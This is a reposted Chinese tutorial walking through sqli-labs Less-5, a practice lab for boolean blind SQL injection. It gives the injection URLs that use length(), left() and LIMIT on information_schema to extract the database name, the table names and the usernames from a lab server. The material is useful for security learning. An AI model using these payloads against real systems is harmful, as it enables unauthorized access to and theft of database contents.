IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓ 		图片批量下载器
↓批量下载图片,美女图库↓ 		图片自动播放器
↓图片自动播放器↓ 		一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 大数据 -> sql-libs——less5(盲注) -> 正文阅读

[大数据]sql-libs——less5(盲注)

首先打开页面,输入? id=1,发现没有任何数据爆出在这里插入图片描述这时把ID换成一个不存在数据-1试一下,发现连 you are in …都没有了,这就是典型的盲注,正确时显示you are in …,不正确时什么也不显示。

http://192.168.0.5:9002/Less-5/?id=-1

在这里插入图片描述'试一下,发现报错,说明存在SQL注入漏洞。
http://192.168.0.5:9002/Less-5/?id=-1'
在这里插入图片描述
首先我们使用length()函数获取数据库名字的长度
这里呢等于7没有返回任何信息,证明数据库的名字不为7

http://192.168.0.5:9002/Less-5/?id=1%27%20and%20length(database())=7--+

在这里插入图片描述=8这时页面返回正常内容,说明数据库的名字长度为8,这里也可以使用< >大于小于等符号进行大致范围判断。
在这里插入图片描述根据上述操作我们已知数据的长度为8
这里呢我们使用left函数,来猜测数据库每一位的字母
LEFT(str,len):返回最左边的n个字符的字符串str,或NULL如果任何参数是NULL。

 http://192.168.0.5:9002/Less-5/?id=1%27%20and%20left(database(),1)=%27s%27%20--+

在这里插入图片描述更换left参数,逐个猜解数据库名称

192.168.0.5:9002/Less-5/?id=1' and left(database(),2)='se' --+

在这里插入图片描述
最后得到left(database(),8)=‘security’

根据上述的方法进行尝试,得到第一个表名email

http://192.168.31.164:9002/Less-5/?id=1’ and left((select group_concat(table_name) from information_schema.tables where table_schema=database()),2)=‘ba’ --+

在这里插入图片描述
数据库中不只有一个表,在查询第二个表时需要使用limit
其中limit(参数1,参数2)
参数1代表:返回第几行,从0开始算
参数2代表:返回几条数据。

http://192.168.31.164:9002/Less-5/?id=1' and left((select table_name from information_schema.tables where table_schema='security' LIMIT 1,1),2)='em' --+

此时不能使用group_concat()函数,该函数的意思是所查询的数据合成一条数据,中间使用分割,而limit()只能返回某一行,如果使用group_concat()返回一行数据,则不能判别表的名字。
更换limit()中的参数1,来猜表名;

http://192.168.31.164:9002/Less-5/?id=1' and left((select table_name from information_schema.tables where table_schema='security' LIMIT 1,1),3)='ema' --+


http://192.168.31.164:9002/Less-5/?id=1' and left((select table_name from information_schema.tables where table_schema='security' LIMIT 2,1),1)='r' --+


依次猜解表名。
最后得到有用的表名users
猜解字段同上

http://192.168.31.164:9002/Less-5/?id=1' and left((select column_name from information_schema.columns where table_name='users' limit 1,1),1 )='u' --+

猜解数据,方法同上

http://192.168.31.164:9002/Less-5/?id=1' and left((select username from security.users limit 0,1),1 )='d' --+

在这里插入图片描述
  大数据 最新文章
实现Kafka至少消费一次
亚马逊云科技:还在苦于ETL?Zero ETL的时代
初探MapReduce
【SpringBoot框架篇】32.基于注解+redis实现
Elasticsearch:如何减少 Elasticsearch 集
Go redis操作
Redis面试题
专题五 Redis高并发场景
基于GBase8s和Calcite的多数据源查询
Redis——底层数据结构原理
上一篇文章      下一篇文章      查看所有文章
加:2021-10-17 12:03:34  更:2021-10-17 12:04:08 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/24 1:18:49-

图片自动播放器
↓图片自动播放器↓ 		TxT小说阅读器
↓语音阅读,小说下载,古典文学↓ 		一键清除垃圾
↓轻轻一点,清除系统垃圾↓ 		图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码